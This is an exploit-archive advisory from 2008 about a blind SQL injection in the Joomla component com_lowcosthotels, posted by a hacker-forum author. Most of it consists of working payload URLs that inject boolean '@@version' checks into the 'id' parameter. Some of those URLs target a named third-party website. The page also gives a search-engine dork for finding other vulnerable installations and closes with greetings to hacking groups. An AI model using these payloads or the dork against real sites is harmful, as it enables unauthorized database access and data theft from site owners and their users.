[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln
# Published : 2008-12-23
# Author : Hussin X
# Previous Title : StormBoard 1.0.1 (thread.php id) SQL Injection Vulnerability
# Next Title : Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
___________________________________
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
_______
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ / / / / ___| / ___| / ___|
| | | |_) | V / / _ | | _ | | | |
| | | _ < | | / ___ | |_| | _ | |___ | |___
|_| |_| _ |_| /_/ _ ____| (_) ____| ____|
# www.Syue.com [2008-12-23]